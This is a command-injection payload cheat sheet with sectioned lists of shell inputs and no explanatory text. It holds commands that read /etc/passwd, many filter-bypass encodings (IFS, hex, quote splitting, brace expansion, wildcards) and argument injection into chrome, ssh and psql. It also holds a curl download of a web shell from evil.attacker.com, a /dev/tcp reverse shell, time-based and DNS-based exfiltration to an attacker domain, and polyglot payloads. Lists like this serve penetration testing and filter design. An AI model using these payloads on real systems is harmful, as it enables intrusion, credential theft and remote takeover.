# ===============================
# BASIC COMMAND EXECUTION
# ===============================
cat /etc/passwd
id
whoami

# ===============================
# COMMAND CHAINING
# ===============================
command1; command2
command1 && command2
command1 || command2
command1 & command2
command1 | command2

# ===============================
# ARGUMENT INJECTION (EXAMPLES)
# ===============================
chrome '--gpu-launcher="id>/tmp/foo"'
ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
psql -o'|id>/tmp/foo'

# ===============================
# WORSTFIT / UNICODE QUOTES
# ===============================
--use-askpass=calc
＂ --use-askpass=calc ＂

# ===============================
# FILE WRITE / WEB SHELL DROP
# ===============================
curl http://evil.attacker.com/ -o webshell.php

# ===============================
# BACKTICKS EXECUTION
# ===============================
`cat /etc/passwd`
`id`
`whoami`

# ===============================
# COMMAND SUBSTITUTION
# ===============================
$(cat /etc/passwd)
$(id)
$(whoami)

# ===============================
# BYPASS WITHOUT SPACE (IFS)
# ===============================
cat${IFS}/etc/passwd
ls${IFS}-la
uname${IFS}-a

# ===============================
# BRACE EXPANSION
# ===============================
{cat,/etc/passwd}
{,ip,a}
{,ifconfig}
{,ifconfig,eth0}
{l,-lh}s
{,echo,#test}
{,$"whoami",}

# ===============================
# INPUT REDIRECTION
# ===============================
cat</etc/passwd
sh</dev/tcp/127.0.0.1/4242

# ===============================
# ANSI-C QUOTING
# ===============================
X=$'uname\x20-a'&&$X
$'cat\x20/etc/passwd'

# ===============================
# TAB AS SPACE
# ===============================
;ls%09-al%09/home

# ===============================
# WINDOWS ENV SUBSTRING
# ===============================
ping%CommonProgramFiles:~10,-18%127.0.0.1
ping%PROGRAMFILES:~10,-5%127.0.0.1

# ===============================
# LINE RETURN BYPASS
# ===============================
original_cmd
ls

# ===============================
# BACKSLASH + NEWLINE
# ===============================
cat /et\
c/pa\
sswd
cat%20/et%5C%0Ac/pa%5C%0Asswd

# ===============================
# TILDE EXPANSION
# ===============================
echo ~+
echo ~-

# ===============================
# CHARACTER FILTER BYPASS (NO / OR \)
# ===============================
${HOME:0:1}etc${HOME:0:1}passwd
$(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

# ===============================
# HEX ENCODING BYPASS
# ===============================
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
xxd -r -p <<< 2f6574632f706173737764
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`

# ===============================
# SINGLE QUOTE BYPASS
# ===============================
w'h'o'am'i
wh''oami
'w'hoami

# ===============================
# DOUBLE QUOTE BYPASS
# ===============================
w"h"o"am"i
wh""oami
"wh"oami

# ===============================
# BACKTICK BYPASS
# ===============================
wh``oami

# ===============================
# BACKSLASH / SLASH BYPASS
# ===============================
w\ho\am\i
/\b\i\n/////s\h

# ===============================
# $@ BYPASS
# ===============================
who$@ami
echo whoami|$0

# ===============================
# $() BYPASS
# ===============================
who$()ami
who$(echo am)i
who`echo am`i

# ===============================
# VARIABLE EXPANSION
# ===============================
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

# ===============================
# WILDCARDS
# ===============================
powershell C:\*\*2\n??e*d.*?
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e

# ===============================
# RANDOM CASE (WINDOWS)
# ===============================
wHoAmi
DiR

# ===============================
# TIME-BASED EXFILTRATION
# ===============================
if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi

# ===============================
# DNS-BASED EXFILTRATION
# ===============================
for i in $(ls /) ; do host "$i.attacker.dns"; done

# ===============================
# POLYGLOT COMMAND INJECTION
# ===============================
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
